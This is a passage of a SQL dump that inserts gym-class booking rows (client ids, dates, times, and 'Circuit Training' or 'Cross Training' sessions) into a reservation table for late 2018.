(14082, 231, 'CTR', '2019-01-02', '18h00', '19h00', 'Circuit Training'),
(14080, 231, 'CTR', '2018-12-26', '18h00', '19h00', 'Circuit Training'),
(14079, 338, 'CTR', '2018-12-26', '18h00', '19h00', 'Circuit Training'),
(14078, 294, 'CTR', '2018-12-26', '18h00', '19h00', 'Circuit Training'),
(14076, 375, 'CTR', '2018-12-27', '18h30', '19h30', 'Circuit Training'),
(14075, 173, 'CTR', '2018-12-26', '18h00', '19h00', 'Circuit Training'),
(14047, 92, 'CTR', '2018-12-13', '18h30', '19h30', 'Circuit Training'),
(14045, 375, 'CTR', '2018-12-13', '18h30', '19h30', 'Circuit Training'),
(14048, 80, 'CTR', '2018-12-13', '18h30', '19h30', 'Circuit Training'),
(14041, 376, 'CTR', '2018-12-17', '19h00', '20h00', 'Cross Training'),
(14040, 230, 'CTR', '2018-12-17', '19h00', '20h00', 'Cross Training'),
(14062, 376, 'CTR', '2018-12-20', '18h30', '19h30', 'Circuit Training'),
(13967, 294, 'CTR', '2018-12-13', '18h30', '19h30', 'Circuit Training'),
(14081, 367, 'CTR', '2018-12-27', '18h30', '19h30', 'Circuit Training'),
(13969, 260, 'CTR', '2018-12-03', '18h00', '19h00', 'Cross Training'),
(14034, 80, 'CTR', '2018-12-10', '19h00', '20h00', 'Cross Training'),
(13971, 205, 'CTR', '2018-12-03', '19h00', '20h00', 'Cross Training'),
(14039, 132, 'CTR', '2018-12-17', '19h00', '20h00', 'Cross Training'),
(14042, 205, 'CTR', '2018-12-17', '19h00', '20h00', 'Cross Training'),
(14037, 374, 'CTR', '2018-12-17', '19h00', '20h00', 'Cross Training'),
(14029, 294, 'CTR', '2018-12-20', '18h30', '19h30', 'Circuit Training'),
(13995, 348, 'CTR', '2018-12-05', '19h00', '20h00', 'Circuit Training'),
(13996, 173, 'CTR', '2018-12-05', '19h00', '20h00', 'Circuit Training'),
(13997, 339, 'CTR', '2018-12-05', '19h00', '20h00', 'Circuit Training'),
(14071, 294, 'CTR', '2018-12-27', '18h30', '19h30', 'Circuit Training'),
(14114, 377, 'CTR', '2019-01-10', '18h30', '19h30', 'Circuit Training'),
(14050, 132, 'CTR', '2018-12-19', '20h00', '21h00', 'Cross Training'),
(14051, 210, 'CTR', '2018-12-13', '18h30', '19h30', 'Circuit Training'),
(14052, 138, 'CTR', '2018-12-19', '18h00', '19h00', 'Circuit Training'),
(14060, 48, 'CTR', '2018-12-19', '18h00', '19h00', 'Circuit Training'),
(14054, 56, 'CTR', '2018-12-17', '18h00', '19h00', 'Cross Training'),
(14055, 31, 'CTR', '2018-12-19', '18h00', '19h00', 'Circuit Training'),
(14056, 365, 'CTR', '2018-12-17', '19h00', '20h00', 'Cross Training'),
(14057, 294, 'CTR', '2019-01-07', '18h00', '19h00', 'Cross Training'),
(14049, 371, 'CTR', '2018-12-13', '18h30', '19h30', 'Circuit Training'),
(14072, 205, 'CTR', '2018-12-26', '18h00', '19h00', 'Circuit Training'),
(14065, 132, 'CTR', '2019-01-02', '20h00', '21h00', 'Cross Training'),
(14077, 132, 'CTR', '2019-01-07', '19h00', '20h00', 'Cross Training'),
(14004, 376, 'CTR', '2018-12-05', '20h00', '21h00', 'Cross Training'),
(14003, 369, 'CTR', '2018-12-05', '20h00', '21h00', 'Cross Training'),
(14002, 180, 'CTR', '2018-12-05', '20h00', '21h00', 'Cross Training'),
(14001, 165, 'CTR', '2018-12-05', '20h00', '21h00', 'Cross Training'),
(14000, 365, 'CTR', '2018-12-05', '20h00', '21h00', 'Cross Training'),
(13999, 132, 'CTR', '2018-12-05', '20h00', '21h00', 'Cross Training'),
(13998, 344, 'CTR', '2018-12-05', '19h00', '20h00', 'Circuit Training'),
(13994, 348, 'CTR', '2018-12-05', '19h00', '20h00', 'Circuit Training'),
(13993, 230, 'CTR', '2018-12-05', '19h00', '20h00', 'Circuit Training'),
(13992, 310, 'CTR', '2018-12-05', '19h00', '20h00', 'Circuit Training'),
(13989, 138, 'CTR', '2018-12-05', '18h00', '19h00', 'Circuit Training'),
(13990, 344, 'CTR', '2018-12-05', '18h00', '19h00', 'Circuit Training'),
(13991, 247, 'CTR', '2018-12-05', '19h00', '20h00', 'Circuit Training'),
(13988, 31, 'CTR', '2018-12-05', '18h00', '19h00', 'Circuit Training'),
(14063, 205, 'CTR', '2018-12-20', '18h30', '19h30', 'Circuit Training'),
(13986, 231, 'CTR', '2018-12-05', '18h00', '19h00', 'Circuit Training'),
(13985, 92, 'CTR', '2018-12-05', '18h00', '19h00', 'Circuit Training'),
(13882, 344, 'CTR', '2018-11-21', '18h00', '19h00', 'Circuit Training'),
(13883, 363, 'CTR', '2018-11-21', '19h00', '20h00', 'Circuit Training'),
(13984, 376, 'CTR', '2018-12-10', '19h00', '20h00', 'Cross Training'),
(14028, 294, 'CTR', '2018-12-17', '19h00', '20h00', 'Cross Training'),
(13982, 374, 'CTR', '2018-12-10', '19h00', '20h00', 'Cross Training'),
(13919, 348, 'CTR', '2018-11-28', '19h00', '20h00', 'Circuit Training'),
(13920, 348, 'CTR', '2018-11-28', '19h00', '20h00', 'Circuit Training'),
(13981, 230, 'CTR', '2018-12-10', '19h00', '20h00', 'Cross Training'),
(13980, 132, 'CTR', '2018-12-10', '19h00', '20h00', 'Cross Training'),
(13979, 351, 'CTR', '2018-12-10', '19h00', '20h00', 'Cross Training'),
(14086, 230, 'CTR', '2018-12-26', '18h00', '19h00', 'Circuit Training'),
(14061, 375, 'CTR', '2018-12-20', '18h30', '19h30', 'Circuit Training'),
(13973, 140, 'CTR', '2018-12-03', '18h00', '19h00', 'Cross Training'),
(13974, 210, 'CTR', '2018-12-05', '18h00', '19h00', 'Circuit Training'),
(14032, 255, 'CTR', '2018-12-17', '18h00', '19h00', 'Cross Training'),
(14031, 231, 'CTR', '2018-12-17', '18h00', '19h00', 'Cross Training'),
(13964, 374, 'CTR', '2018-12-03', '19h00', '20h00', 'Cross Training'),
(13958, 376, 'CTR', '2018-11-26', '19h00', '20h00', 'Cross Training'),
(13957, 367, 'CTR', '2018-11-29', '18h30', '19h30', 'Circuit Training'),
(13956, 230, 'CTR', '2018-12-03', '19h00', '20h00', 'Cross Training'),
(13955, 350, 'CTR', '2018-12-03', '19h00', '20h00', 'Cross Training'),
(13954, 132, 'CTR', '2018-12-03', '19h00', '20h00', 'Cross Training'),
(13953, 365, 'CTR', '2018-12-03', '19h00', '20h00', 'Cross Training'),
(13952, 138, 'CTR', '2018-12-03', '18h00', '19h00', 'Cross Training'),
(13951, 56, 'CTR', '2018-12-03', '18h00', '19h00', 'Cross Training'),
(13950, 294, 'CTR', '2018-12-03', '18h00', '19h00', 'Cross Training'),
(13949, 255, 'CTR', '2018-12-03', '18h00', '19h00', 'Cross Training'),
(13948, 231, 'CTR', '2018-12-03', '18h00', '19h00', 'Cross Training'),
(13962, 376, 'CTR', '2018-12-03', '19h00', '20h00', 'Cross Training'),
(13945, 230, 'CTR', '2018-11-26', '19h00', '20h00', 'Cross Training'),
(13944, 374, 'CTR', '2018-11-26', '19h00', '20h00', 'Cross Training'),
(13943, 350, 'CTR', '2018-11-26', '19h00', '20h00', 'Cross Training'),
(13961, 351, 'CTR', '2018-12-03', '19h00', '20h00', 'Cross Training'),
(13941, 365, 'CTR', '2018-11-26', '19h00', '20h00', 'Cross Training'),
(13940, 103, 'CTR', '2018-11-26', '18h00', '19h00', 'Cross Training'),
(13960, 138, 'CTR', '2018-11-28', '18h00', '19h00', 'Circuit Training'),
(13938, 138, 'CTR', '2018-11-26', '18h00', '19h00', 'Cross Training'),
(13937, 56, 'CTR', '2018-11-26', '18h00', '19h00', 'Cross Training'),
(13936, 304, 'CTR', '2018-11-26', '18h00', '19h00', 'Cross Training'),
(14035, 205, 'CTR', '2018-12-10', '19h00', '20h00', 'Cross Training'),
(13934, 294, 'CTR', '2018-12-05', '19h00', '20h00', 'Circuit Training'),
(14033, 294, 'CTR', '2018-12-10', '19h00', '20h00', 'Cross Training'),
(13959, 48, 'CTR', '2018-11-28', '18h00', '19h00', 'Circuit Training'),
(13931, 294, 'CTR', '2018-11-26', '18h00', '19h00', 'Cross Training'),
(13930, 210, 'CTR', '2018-11-28', '20h00', '21h00', 'Cross Training'),
(13929, 376, 'CTR', '2018-11-22', '18h30', '19h30', 'Circuit Training'),
(13928, 369, 'CTR', '2018-11-28', '20h00', '21h00', 'Cross Training'),
(13927, 165, 'CTR', '2018-11-28', '20h00', '21h00', 'Cross Training'),
(13926, 180, 'CTR', '2018-11-28', '20h00', '21h00', 'Cross Training'),
(13925, 365, 'CTR', '2018-11-28', '20h00', '21h00', 'Cross Training'),
(13924, 132, 'CTR', '2018-11-28', '20h00', '21h00', 'Cross Training'),
(13923, 344, 'CTR', '2018-11-28', '20h00', '21h00', 'Cross Training'),
(13922, 339, 'CTR', '2018-11-28', '19h00', '20h00', 'Circuit Training'),
(13921, 230, 'CTR', '2018-11-28', '19h00', '20h00', 'Circuit Training'),
(13918, 310, 'CTR', '2018-11-28', '19h00', '20h00', 'Circuit Training'),
(13917, 247, 'CTR', '2018-11-28', '19h00', '20h00', 'Circuit Training'),
(13916, 173, 'CTR', '2018-11-28', '19h00', '20h00', 'Circuit Training'),
(13915, 92, 'CTR', '2018-11-28', '18h00', '19h00', 'Circuit Training'),
(13910, 375, 'CTR', '2018-11-22', '18h30', '19h30', 'Circuit Training'),
(13907, 367, 'CTR', '2018-11-22', '18h30', '19h30', 'Circuit Training'),
(13946, 132, 'CTR', '2018-11-26', '19h00', '20h00', 'Cross Training'),
(13908, 103, 'CTR', '2018-11-21', '18h00', '19h00', 'Circuit Training'),
(13904, 230, 'CTR', '2018-11-19', '19h00', '20h00', 'Cross Training'),
(13899, 138, 'CTR', '2018-11-19', '18h00', '19h00', 'Cross Training'),
(13897, 304, 'CTR', '2018-11-19', '18h00', '19h00', 'Cross Training'),
(13896, 205, 'CTR', '2018-11-19', '18h00', '19h00', 'Cross Training'),
(13895, 249, 'CTR', '2018-11-19', '18h00', '19h00', 'Cross Training'),
(13894, 132, 'CTR', '2018-11-21', '20h00', '21h00', 'Cross Training'),
(13893, 165, 'CTR', '2018-11-21', '20h00', '21h00', 'Cross Training'),
(13892, 180, 'CTR', '2018-11-21', '20h00', '21h00', 'Cross Training'),
(13891, 173, 'CTR', '2018-11-21', '19h00', '20h00', 'Circuit Training'),
(13913, 231, 'CTR', '2018-11-28', '18h00', '19h00', 'Circuit Training'),
(13889, 348, 'CTR', '2018-11-21', '19h00', '20h00', 'Circuit Training'),
(13888, 348, 'CTR', '2018-11-21', '19h00', '20h00', 'Circuit Training'),
(13887, 310, 'CTR', '2018-11-21', '19h00', '20h00', 'Circuit Training'),
(13865, 344, 'CTR', '2018-11-14', '20h00', '21h00', 'Cross Training'),
(13866, 165, 'CTR', '2018-11-14', '20h00', '21h00', 'Cross Training'),
(13914, 31, 'CTR', '2018-11-28', '18h00', '19h00', 'Circuit Training'),
(13885, 230, 'CTR', '2018-11-21', '19h00', '20h00', 'Circuit Training'),
(13912, 177, 'CTR', '2018-11-28', '18h00', '19h00', 'Circuit Training'),
(13881, 92, 'CTR', '2018-11-21', '18h00', '19h00', 'Circuit Training'),
(13903, 210, 'CTR', '2018-11-21', '18h00', '19h00', 'Circuit Training'),
(13879, 231, 'CTR', '2018-11-21', '18h00', '19h00', 'Circuit Training'),
(13878, 177, 'CTR', '2018-11-21', '18h00', '19h00', 'Circuit Training'),
(13877, 31, 'CTR', '2018-11-21', '18h00', '19h00', 'Circuit Training'),
(13876, 375, 'CTR', '2018-11-15', '18h30', '19h30', 'Circuit Training'),
(13902, 56, 'CTR', '2018-11-19', '18h00', '19h00', 'Cross Training'),
(13911, 231, 'CTR', '2018-11-26', '18h00', '19h00', 'Cross Training'),
(13872, 260, 'CTR', '2018-11-19', '18h00', '19h00', 'Cross Training'),
(13871, 367, 'CTR', '2018-11-15', '18h30', '19h30', 'Circuit Training'),
(13870, 338, 'CTR', '2018-11-14', '18h00', '19h00', 'Circuit Training'),
(13869, 103, 'CTR', '2018-11-14', '18h00', '19h00', 'Circuit Training'),
(13868, 210, 'CTR', '2018-11-14', '18h00', '19h00', 'Circuit Training'),
(13867, 323, 'CTR', '2018-11-14', '20h00', '21h00', 'Cross Training'),
(13864, 365, 'CTR', '2018-11-14', '20h00', '21h00', 'Cross Training'),
(13863, 369, 'CTR', '2018-11-14', '20h00', '21h00', 'Cross Training'),
(13862, 132, 'CTR', '2018-11-14', '20h00', '21h00', 'Cross Training'),
(13861, 180, 'CTR', '2018-11-14', '20h00', '21h00', 'Cross Training'),
(13860, 348, 'CTR', '2018-11-14', '19h00', '20h00', 'Circuit Training'),
(13859, 348, 'CTR', '2018-11-14', '19h00', '20h00', 'Circuit Training'),
(13858, 339, 'CTR', '2018-11-14', '19h00', '20h00', 'Circuit Training'),
(13857, 310, 'CTR', '2018-11-14', '19h00', '20h00', 'Circuit Training'),
(13856, 247, 'CTR', '2018-11-14', '19h00', '20h00', 'Circuit Training'),
(13855, 173, 'CTR', '2018-11-14', '19h00', '20h00', 'Circuit Training'),
(13854, 231, 'CTR', '2018-11-14', '18h00', '19h00', 'Circuit Training'),
(13853, 177, 'CTR', '2018-11-14', '18h00', '19h00', 'Circuit Training'),
(13852, 255, 'CTR', '2018-11-19', '18h00', '19h00', 'Cross Training'),
(13909, 255, 'CTR', '2018-11-26', '18h00', '19h00', 'Cross Training'),
(13847, 374, 'CTR', '2018-11-12', '19h00', '20h00', 'Cross Training'),
(13845, 92, 'CTR', '2018-11-14', '18h00', '19h00', 'Circuit Training'),
(13850, 180, 'CTR', '2018-11-12', '19h00', '20h00', 'Cross Training'),
(13843, 294, 'CTR', '2018-11-12', '18h00', '19h00', 'Cross Training'),
(13842, 56, 'CTR', '2018-11-12', '18h00', '19h00', 'Cross Training');
INSERT INTO `reservation_reservation` (`id`, `id_client`, `id_salle`, `date`, `heure_deb`, `heure_fin`, `type_seance`) VALUES
(13841, 230, 'CTR', '2018-11-14', '19h00', '20h00', 'Circuit Training'),
(13840, 230, 'CTR', '2018-11-12', '19h00', '20h00', 'Cross Training'),
(13839, 31, 'CTR', '2018-11-14', '18h00', '19h00', 'Circuit Training'),
(13846, 365, 'CTR', '2018-11-12', '19h00', '20h00', 'Cross Training'),
(13833, 371, 'CTR', '2018-11-15', '18h30', '19h30', 'Circuit Training'),
(13834, 370, 'CTR', '2018-11-08', '18h30', '19h30', 'Circuit Training'),
(13835, 371, 'CTR', '2018-11-22', '18h30', '19h30', 'Circuit Training'),
(13830, 371, 'CTR', '2018-11-08', '18h30', '19h30', 'Circuit Training'),
(13849, 338, 'CTR', '2018-11-12', '18h00', '19h00', 'Cross Training'),
(13848, 341, 'CTR', '2018-11-12', '19h00', '20h00', 'Cross Training'),
(13823, 255, 'CTR', '2018-11-12', '18h00', '19h00', 'Cross Training'),
(13837, 138, 'CTR', '2018-11-14', '18h00', '19h00', 'Circuit Training'),
(13821, 132, 'CTR', '2018-11-12', '18h00', '19h00', 'Cross Training'),
(13824, 210, 'CTR', '2018-11-07', '18h00', '19h00', 'Circuit Training'),
(13819, 375, 'CTR', '2018-11-05', '19h00', '20h00', 'Cross Training'),
(13818, 103, 'CTR', '2018-11-05', '19h00', '20h00', 'Cross Training'),
(13817, 365, 'CTR', '2018-11-05', '19h00', '20h00', 'Cross Training'),
(13816, 368, 'CTR', '2018-11-05', '19h00', '20h00', 'Cross Training'),
(13815, 231, 'CTR', '2018-11-05', '18h00', '19h00', 'Cross Training'),
(13827, 363, 'CTR', '2018-11-14', '19h00', '20h00', 'Circuit Training'),
(13826, 363, 'CTR', '2018-11-14', '19h00', '20h00', 'Circuit Training'),
(13812, 230, 'CTR', '2018-11-05', '19h00', '20h00', 'Cross Training'),
(13811, 367, 'CTR', '2018-11-08', '18h30', '19h30', 'Circuit Training'),
(13810, 92, 'CTR', '2018-11-12', '18h00', '19h00', 'Cross Training'),
(13809, 92, 'CTR', '2018-11-05', '18h00', '19h00', 'Cross Training'),
(13807, 323, 'CTR', '2018-11-07', '20h00', '21h00', 'Cross Training'),
(13806, 165, 'CTR', '2018-11-07', '20h00', '21h00', 'Cross Training'),
(13805, 369, 'CTR', '2018-11-07', '20h00', '21h00', 'Cross Training'),
(13804, 365, 'CTR', '2018-11-07', '20h00', '21h00', 'Cross Training'),
(13803, 180, 'CTR', '2018-11-07', '20h00', '21h00', 'Cross Training'),
(13802, 132, 'CTR', '2018-11-07', '20h00', '21h00', 'Cross Training'),
(13801, 230, 'CTR', '2018-11-07', '19h00', '20h00', 'Circuit Training'),
(13800, 173, 'CTR', '2018-11-07', '19h00', '20h00', 'Circuit Training'),
(13799, 339, 'CTR', '2018-11-07', '19h00', '20h00', 'Circuit Training'),
(13795, 247, 'CTR', '2018-11-07', '19h00', '20h00', 'Circuit Training'),
(13796, 310, 'CTR', '2018-11-07', '19h00', '20h00', 'Circuit Training'),
(13798, 348, 'CTR', '2018-11-07', '19h00', '20h00', 'Circuit Training'),
(13797, 348, 'CTR', '2018-11-07', '19h00', '20h00', 'Circuit Training'),
(13794, 344, 'CTR', '2018-11-07', '18h00', '19h00', 'Circuit Training'),
(13793, 177, 'CTR', '2018-11-07', '18h00', '19h00', 'Circuit Training'),
(13792, 92, 'CTR', '2018-11-07', '18h00', '19h00', 'Circuit Training'),
(13791, 231, 'CTR', '2018-11-07', '18h00', '19h00', 'Circuit Training'),
(13790, 31, 'CTR', '2018-11-07', '18h00', '19h00', 'Circuit Training'),
(13787, 294, 'CTR', '2018-11-15', '18h30', '19h30', 'Circuit Training'),
(13786, 294, 'CTR', '2018-11-08', '18h30', '19h30', 'Circuit Training'),
(13785, 304, 'CTR', '2018-11-05', '18h00', '19h00', 'Cross Training'),
(13836, 138, 'CTR', '2018-11-12', '18h00', '19h00', 'Cross Training'),
(13783, 294, 'CTR', '2018-11-14', '19h00', '20h00', 'Circuit Training'),
(13829, 231, 'CTR', '2018-11-12', '18h00', '19h00', 'Cross Training'),
(13782, 304, 'CTR', '2018-10-31', '18h00', '19h00', 'Circuit Training'),
(13780, 138, 'CTR', '2018-11-05', '18h00', '19h00', 'Cross Training'),
(14070, 377, 'CTR', '2018-12-27', '18h30', '19h30', 'Circuit Training'),
(14069, 294, 'CTR', '2019-01-02', '19h00', '20h00', 'Circuit Training'),
(13777, 132, 'CTR', '2018-11-05', '18h00', '19h00', 'Cross Training'),
(13776, 255, 'CTR', '2018-11-05', '18h00', '19h00', 'Cross Training'),
(13775, 329, 'CTR', '2018-10-31', '18h00', '19h00', 'Circuit Training'),
(13774, 210, 'CTR', '2018-10-31', '18h00', '19h00', 'Circuit Training'),
(13701, 132, 'CTR', '2018-10-17', '20h00', '21h00', 'Cross Training'),
(13702, 344, 'CTR', '2018-10-17', '20h00', '21h00', 'Cross Training'),
(13773, 294, 'CTR', '2018-11-07', '19h00', '20h00', 'Circuit Training'),
(13772, 294, 'CTR', '2018-11-05', '18h00', '19h00', 'Cross Training'),
(13770, 367, 'CTR', '2018-11-01', '18h30', '19h30', 'Circuit Training'),
(13769, 205, 'CTR', '2018-10-29', '18h00', '19h00', 'Cross Training'),
(13808, 260, 'CTR', '2018-11-05', '18h00', '19h00', 'Cross Training'),
(13766, 260, 'CTR', '2018-10-29', '18h00', '19h00', 'Cross Training'),
(13765, 344, 'CTR', '2018-10-31', '18h00', '19h00', 'Circuit Training'),
(13764, 138, 'CTR', '2018-10-29', '18h00', '19h00', 'Cross Training'),
(13762, 31, 'CTR', '2018-10-31', '18h00', '19h00', 'Circuit Training'),
(13761, 370, 'CTR', '2018-10-25', '18h30', '19h30', 'Circuit Training'),
(13760, 348, 'CTR', '2018-10-31', '19h00', '20h00', 'Circuit Training'),
(13759, 348, 'CTR', '2018-10-31', '19h00', '20h00', 'Circuit Training'),
(13758, 339, 'CTR', '2018-10-31', '19h00', '20h00', 'Circuit Training'),
(13757, 310, 'CTR', '2018-10-31', '19h00', '20h00', 'Circuit Training'),
(13763, 231, 'CTR', '2018-10-29', '18h00', '19h00', 'Cross Training'),
(13755, 230, 'CTR', '2018-10-31', '19h00', '20h00', 'Circuit Training'),
(13754, 173, 'CTR', '2018-10-31', '19h00', '20h00', 'Circuit Training'),
(13753, 132, 'CTR', '2018-10-31', '18h00', '19h00', 'Circuit Training'),
(13752, 231, 'CTR', '2018-10-31', '18h00', '19h00', 'Circuit Training'),
(13751, 205, 'CTR', '2018-10-31', '18h00', '19h00', 'Circuit Training'),
(13767, 292, 'CTR', '2018-10-29', '18h00', '19h00', 'Cross Training'),
(13749, 56, 'CTR', '2018-10-24', '20h00', '21h00', 'Cross Training'),
(13748, 132, 'CTR', '2018-10-29', '18h00', '19h00', 'Cross Training'),
(13747, 132, 'CTR', '2018-10-24', '20h00', '21h00', 'Cross Training'),
(13746, 369, 'CTR', '2018-10-24', '20h00', '21h00', 'Cross Training'),
(13745, 323, 'CTR', '2018-10-24', '20h00', '21h00', 'Cross Training'),
(13744, 165, 'CTR', '2018-10-24', '20h00', '21h00', 'Cross Training'),
(13743, 230, 'CTR', '2018-10-24', '19h00', '20h00', 'Circuit Training'),
(13742, 348, 'CTR', '2018-10-24', '19h00', '20h00', 'Circuit Training'),
(13741, 348, 'CTR', '2018-10-25', '18h30', '19h30', 'Circuit Training'),
(13740, 348, 'CTR', '2018-10-24', '19h00', '20h00', 'Circuit Training'),
(13739, 339, 'CTR', '2018-10-24', '19h00', '20h00', 'Circuit Training'),
(13738, 173, 'CTR', '2018-10-24', '19h00', '20h00', 'Circuit Training'),
(13703, 165, 'CTR', '2018-10-17', '20h00', '21h00', 'Cross Training'),
(13737, 173, 'CTR', '2018-10-25', '18h30', '19h30', 'Circuit Training'),
(13736, 310, 'CTR', '2018-10-24', '19h00', '20h00', 'Circuit Training'),
(13735, 247, 'CTR', '2018-10-24', '19h00', '20h00', 'Circuit Training'),
(13734, 205, 'CTR', '2018-10-24', '18h00', '19h00', 'Circuit Training'),
(13733, 177, 'CTR', '2018-10-24', '18h00', '19h00', 'Circuit Training'),
(13732, 231, 'CTR', '2018-10-24', '18h00', '19h00', 'Circuit Training'),
(13771, 80, 'CTR', '2018-10-29', '18h00', '19h00', 'Cross Training'),
(13730, 92, 'CTR', '2018-10-24', '18h00', '19h00', 'Circuit Training'),
(13729, 255, 'CTR', '2018-10-29', '18h00', '19h00', 'Cross Training'),
(13728, 365, 'CTR', '2018-10-22', '19h00', '20h00', 'Cross Training'),
(13727, 304, 'CTR', '2018-10-22', '19h00', '20h00', 'Cross Training'),
(13726, 80, 'CTR', '2018-10-22', '19h00', '20h00', 'Cross Training'),
(13725, 260, 'CTR', '2018-10-22', '18h00', '19h00', 'Cross Training'),
(13724, 230, 'CTR', '2018-10-22', '19h00', '20h00', 'Cross Training'),
(13723, 366, 'CTR', '2018-10-22', '19h00', '20h00', 'Cross Training'),
(13722, 363, 'CTR', '2018-10-22', '19h00', '20h00', 'Cross Training'),
(13721, 56, 'CTR', '2018-10-22', '18h00', '19h00', 'Cross Training'),
(13720, 367, 'CTR', '2018-10-25', '18h30', '19h30', 'Circuit Training'),
(13719, 294, 'CTR', '2018-10-24', '19h00', '20h00', 'Circuit Training'),
(13718, 294, 'CTR', '2018-10-22', '18h00', '19h00', 'Cross Training'),
(13717, 371, 'CTR', '2018-11-01', '18h30', '19h30', 'Circuit Training'),
(13716, 371, 'CTR', '2018-10-25', '18h30', '19h30', 'Circuit Training'),
(13715, 231, 'CTR', '2018-10-22', '18h00', '19h00', 'Cross Training'),
(13714, 255, 'CTR', '2018-10-22', '18h00', '19h00', 'Cross Training'),
(13713, 371, 'CTR', '2018-10-18', '18h30', '19h30', 'Circuit Training'),
(13712, 370, 'CTR', '2018-10-18', '18h30', '19h30', 'Circuit Training'),
(13711, 344, 'CTR', '2018-10-24', '18h00', '19h00', 'Circuit Training'),
(13710, 132, 'CTR', '2018-10-22', '18h00', '19h00', 'Cross Training'),
(13709, 231, 'CTR', '2018-10-15', '18h00', '19h00', 'Cross Training'),
(13708, 368, 'CTR', '2018-10-15', '19h00', '20h00', 'Cross Training'),
(13707, 92, 'CTR', '2018-10-22', '18h00', '19h00', 'Cross Training'),
(13704, 323, 'CTR', '2018-10-17', '20h00', '21h00', 'Cross Training'),
(13700, 173, 'CTR', '2018-10-17', '19h00', '20h00', 'Circuit Training'),
(13699, 339, 'CTR', '2018-10-17', '19h00', '20h00', 'Circuit Training'),
(13698, 348, 'CTR', '2018-10-17', '19h00', '20h00', 'Circuit Training'),
(13697, 348, 'CTR', '2018-10-17', '19h00', '20h00', 'Circuit Training'),
(13696, 310, 'CTR', '2018-10-17', '19h00', '20h00', 'Circuit Training'),
(13695, 247, 'CTR', '2018-10-17', '19h00', '20h00', 'Circuit Training'),
(13694, 230, 'CTR', '2018-10-17', '19h00', '20h00', 'Circuit Training'),
(13693, 92, 'CTR', '2018-10-17', '18h00', '19h00', 'Circuit Training'),
(13692, 138, 'CTR', '2018-10-17', '18h00', '19h00', 'Circuit Training'),
(13691, 31, 'CTR', '2018-10-17', '18h00', '19h00', 'Circuit Training'),
(13690, 177, 'CTR', '2018-10-17', '18h00', '19h00', 'Circuit Training'),
(13689, 231, 'CTR', '2018-10-17', '18h00', '19h00', 'Circuit Training'),
(13688, 205, 'CTR', '2018-10-17', '18h00', '19h00', 'Circuit Training'),
(13687, 180, 'CTR', '2018-10-15', '19h00', '20h00', 'Cross Training'),
(13685, 230, 'CTR', '2018-10-15', '19h00', '20h00', 'Cross Training'),
(13686, 294, 'CTR', '2018-10-15', '19h00', '20h00', 'Cross Training'),
(13682, 205, 'CTR', '2018-10-15', '19h00', '20h00', 'Cross Training'),
(13681, 56, 'CTR', '2018-10-15', '18h00', '19h00', 'Cross Training'),
(13680, 260, 'CTR', '2018-10-15', '18h00', '19h00', 'Cross Training'),
(13705, 138, 'CTR', '2018-10-22', '18h00', '19h00', 'Cross Training'),
(13674, 210, 'CTR', '2018-10-11', '18h30', '19h30', 'Circuit Training'),
(13673, 231, 'CTR', '2018-10-10', '18h00', '19h00', 'Circuit Training'),
(13706, 138, 'CTR', '2018-10-24', '18h00', '19h00', 'Circuit Training'),
(13669, 292, 'CTR', '2018-10-08', '18h00', '19h00', 'Cross Training'),
(13671, 132, 'CTR', '2018-10-15', '18h00', '19h00', 'Cross Training'),
(13676, 294, 'CTR', '2018-10-11', '18h30', '19h30', 'Circuit Training'),
(13683, 294, 'CTR', '2018-10-18', '18h30', '19h30', 'Circuit Training'),
(13678, 255, 'CTR', '2018-10-15', '18h00', '19h00', 'Cross Training'),
(13679, 48, 'CTR', '2018-10-17', '18h00', '19h00', 'Circuit Training'),
(13664, 339, 'CTR', '2018-10-10', '19h00', '20h00', 'Circuit Training'),
(13662, 348, 'CTR', '2018-10-10', '19h00', '20h00', 'Circuit Training'),
(13663, 348, 'CTR', '2018-10-10', '19h00', '20h00', 'Circuit Training'),
(13661, 310, 'CTR', '2018-10-10', '19h00', '20h00', 'Circuit Training'),
(13660, 247, 'CTR', '2018-10-10', '19h00', '20h00', 'Circuit Training'),
(13659, 173, 'CTR', '2018-10-10', '19h00', '20h00', 'Circuit Training'),
(13658, 177, 'CTR', '2018-10-10', '18h00', '19h00', 'Circuit Training'),
(13657, 368, 'CTR', '2018-10-08', '19h00', '20h00', 'Cross Training'),
(13651, 231, 'CTR', '2018-10-08', '18h00', '19h00', 'Cross Training'),
(13652, 138, 'CTR', '2018-10-10', '18h00', '19h00', 'Circuit Training'),
(13656, 180, 'CTR', '2018-10-08', '19h00', '20h00', 'Cross Training'),
(13655, 92, 'CTR', '2018-10-15', '18h00', '19h00', 'Cross Training'),
(13654, 344, 'CTR', '2018-10-15', '18h00', '19h00', 'Cross Training'),
(13653, 138, 'CTR', '2018-10-15', '18h00', '19h00', 'Cross Training'),
(13650, 344, 'CTR', '2018-10-10', '18h00', '19h00', 'Circuit Training'),
(13649, 304, 'CTR', '2018-10-10', '18h00', '19h00', 'Circuit Training'),
(13670, 31, 'CTR', '2018-10-10', '18h00', '19h00', 'Circuit Training'),
(13647, 230, 'CTR', '2018-10-10', '19h00', '20h00', 'Circuit Training'),
(13646, 230, 'CTR', '2018-10-08', '19h00', '20h00', 'Cross Training'),
(13645, 132, 'CTR', '2018-10-10', '20h00', '21h00', 'Cross Training'),
(13644, 92, 'CTR', '2018-10-10', '18h00', '19h00', 'Circuit Training'),
(13643, 92, 'CTR', '2018-10-04', '18h30', '19h30', 'Circuit Training'),
(13642, 350, 'CTR', '2018-10-08', '18h00', '19h00', 'Cross Training'),
(13641, 351, 'CTR', '2018-10-08', '18h00', '19h00', 'Cross Training'),
(13640, 366, 'CTR', '2018-10-08', '19h00', '20h00', 'Cross Training'),
(13639, 363, 'CTR', '2018-10-08', '19h00', '20h00', 'Cross Training'),
(13638, 31, 'CTR', '2018-10-03', '18h00', '19h00', 'Circuit Training'),
(13637, 294, 'CTR', '2018-10-04', '18h30', '19h30', 'Circuit Training'),
(13635, 255, 'CTR', '2018-10-08', '18h00', '19h00', 'Cross Training'),
(13634, 344, 'CTR', '2018-10-04', '18h30', '19h30', 'Circuit Training'),
(13633, 132, 'CTR', '2018-10-08', '18h00', '19h00', 'Cross Training'),
(13632, 369, 'CTR', '2018-10-03', '20h00', '21h00', 'Cross Training'),
(13631, 205, 'CTR', '2018-10-03', '18h00', '19h00', 'Circuit Training'),
(13630, 367, 'CTR', '2018-10-11', '18h30', '19h30', 'Circuit Training'),
(13629, 367, 'CTR', '2018-10-04', '18h30', '19h30', 'Circuit Training'),
(13624, 366, 'CTR', '2018-10-01', '19h00', '20h00', 'Cross Training'),
(13623, 363, 'CTR', '2018-10-01', '19h00', '20h00', 'Cross Training'),
